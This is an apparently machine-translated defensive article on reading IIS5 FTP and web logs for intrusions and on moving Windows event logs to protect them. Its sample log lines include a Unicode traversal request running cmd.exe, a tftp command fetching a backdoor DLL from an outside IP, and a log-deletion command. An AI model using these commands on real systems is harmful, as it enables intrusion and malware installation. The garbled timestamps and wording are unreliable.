Research on the vulnerability of typical intrusion log analysis

1. FTP Log Analysis
The FTP and WWW logs, by default, generate a log file every day that contains all the records for that day, usually the name of ex (year) (month) (date). For example, the ex040419, the April 19, 2004-generated log, can be opened directly with Notepad, ordinary intrusion behavior of the log is generally like this:
#Software: Microsoft Internet Information Services 5.0 (Microsoft IIS5.0)
#Version: 1.0 (Version 1.0)
#Date: 20040419 0315 (service start time date)
#Fields: Time CIP Csmethod Csuristem scstatus
0315 127.0.0.1 [1]user administator 331 (IP address 127.0.0.1 user named Administator attempting to log in)
0318 127.0.0.1 [1]pass–530 (Login failed)
032:04 127.0.0.1 [1]user NT 331 (IP address 127.0.0.1 user named NT tries to log in)
032:06 127.0.0.1 [1]pass–530 (Login failed)
032:09 127.0.0.1 [1]user cyz 331 (IP address 127.0.0.1 user named Cyz attempting to log in)
0322 127.0.0.1 [1]pass–530 (Login failed)
0322 127.0.0.1 [1]user Administrator 331 (IP address 127.0.0.1 User name is administrator attempting to log in)
0324 127.0.0.1 [1]pass–230 (Login successful)
0321 127.0.0.1 [1]MKD NT 550 (new directory failed)
0325 127.0.0.1 [1]quit–550 (Exit FTP program)
From the log can see that the IP address for 127.0.0.1 users have been trying to log on to the system, changed the user name and password four times to succeed, the administrator immediately know that this IP has at least an intrusion attempt! His intrusion time, IP address, and the user name of the probe are clearly recorded in the log. If the previous intruder is eventually entered with the username of the administrator, consider whether the username is a password theft. Or is it being used by others? The next thing to think about is what's going on with the system.
2. www log analysis
The WWW service, like the FTP service, generates logs in the%systemroot%\sys TEM32\LOGFILES\W3SVC1 directory, which is a daily log file by default. Here needs to be specially explained, because the Web log and other logs are different, it is more detailed analysis, need to have a wealth of intrusion, protection knowledge, and be careful enough, otherwise, it is easy to omit that very simple log, and usually such a log is very important. Since we can't have one analysis, here's a simple example:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: Date Time CIP Csusername SIP sport Csmethod csuristem csuriquery scstatus cs (useragent)
20040419 03:091 192.168.1.26 192.168.1.37 get/iisstart.asp mozilla/4.0+ (compatible;+msie+5.0;+windows+98;+ Digext)
20040419 03:094 192.168.1.26 192.168.1.37 get/pagerror.gif mozilla/4.0+ (compatible;+msie+5.0;+windows+98;+ Digext)

By analyzing line sixth, we can see that May 19, 2004, A user with an IP address of 192.168.1.26 accesses a page iisstart.asp by accessing the IP address of the 80 port of the 192.168.1.37 machine, and the user's browser is compatible;+msie+5.0;+windows+98 +digext, experienced administrators can determine the intruder's IP address and intrusion time through the security log, FTP log, and WWW log.
For now very common SQL injection attacks, through the put, get check, you can probably judge that the page out of the problem, thus patching.
3. Analysis of HTTPD transaction log

Microsoft's IIS 5 has been exploited by hackers for a number of vulnerabilities, such as. IDA/.IDQ, Unicode, WebDavx3, and some unknown vulnerabilities, we analyze the log to analyze the behavior of hacking, For the system that did not fix the patch package, the log records of the hacker's successful invasion correspond to the following. In order to introduce a more eye-catching introduction, specifically configured a "old" server, with the old loopholes for everyone to do a demo, it is easy to analogy understand the other.

(1) Unicode vulnerability intrusion log record

This is a very classic loophole, to find such a server is expected to go abroad slowly to find, but because its log is the most classic one, so we have this special here to do a demonstration.

We open the log file for the IIS5 Web service, and the log file default location is under the%systemroot%\system32\logfiles\ folder, as shown in Figure 1 is a typical log record of the Unicode vulnerability intrusion, for normal Web Access is to obtain the Web data using the Get command via port 80, but the illegal character encoding bypasses character validation and gets information that should not be obtained. But patching up the corresponding patch can plug this vulnerability. As shown in figure one.

We cooperated with the invasion to see the record: We can view the directory files of the target machine at the time of intrusion by using the following code:

Get/_vti_bin/. %5c.. /.. %5c.. /.. %5c.. /winnt/system32/cmd.exe/c+dir 200

This access behavior is recorded in the log:

2004-04-19 08:47:47 192.168.0.1-192.168.0.218
/_vti_bin/.. %5c.. /.. %5c.. /.. %5c.. /winnt/system32/cmd.exe
/c+dir 200-

Did you see it? Our logs are clearly recorded and the attackers from 192.168.0.1 view our catalogue. The following line is a log record of the backdoor program being sent to our machine:

2004-04-19 08:47:47 192.168.0.1-192.168.0.218
/_vti_bin/.. %5c.. /.. %5c.. /.. %5c.. /winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20get%20cool.dll%20c:\httpodbc.dll
502–

Did you see that? The record is very detailed, the program in the system is recorded in the response, so that we analyze the intrusion behavior is good to do.

(2) WebDavx3 remote overflow log record

The WEVDAVX3 vulnerabilities that have been known for some time are the most widely used, and if the system suffers from this remote overflow, log records are shown in Figure Ii.

2004-04-19 07:20:13 192.168.0.218-192.168.0.218 LOCK
/aaaaa ...

This means that our web services are attacked from 192.168.0.218 and locked (that is, shutting down) the Web services, and some of the garbled characters that follow are offset-shift guessing processes used in overflow attacks.

Several of the above groceries have logged an IP address with an intrusion behavior, but this IP address may be the attacker used the springboard, that is, this IP is likely to be "chicken" rather than an attacker's IP, in this case, we look at other log files, it is possible to trace the location of the attackers, But this is entirely up to the Administrator's experience.

4. Shift Protection for log files

Through the above methods, you should be able to detect a common system attack, but then again, if the above attack any one succeeds, that now we all can not see the log, early by the intruder emptied, so, in order to prevent, we still for common delete log method, move the log.

A lot of articles introduced to the event log shift can do a good job on the system system protection, although the shift is a protection method, but as long as the command line input dir c:\*.evt/s, you can find the event log location, and then delete can be easy, then how to do? In fact, log shift by modifying the registry to complete, find the registry hkey_local_machine\system\ currentcontrolset\ Services\eventlog under the application, security, System several subkeys, corresponding to the application log, security log, System log, respectively. How to modify it? Let's look at the Application subkey: The file is the location where the application log files are stored, change the key value to the folder where the log files are stored, and we'll%systemroot%\system32\config\ Copy the Appevent.evt file to this folder and restart the machine.

The purpose of the shift is to take advantage of the "security" properties of Windows 2000 in NTFS format, and if you cannot safely set up files without shifting, right-click the shifted folder selection properties and go to the Security tab and do not select Allow inheritable permissions from parent to propagate to this object, add the system group, read permissions to the Everyone group, and select permissions for the system group in addition to full control and modify. Then change the system default log file 512KB size to the size you want, such as 20MB. The above setting is done directly via del c:\*. evt/s/q to delete is not deleted, relative to a lot of security.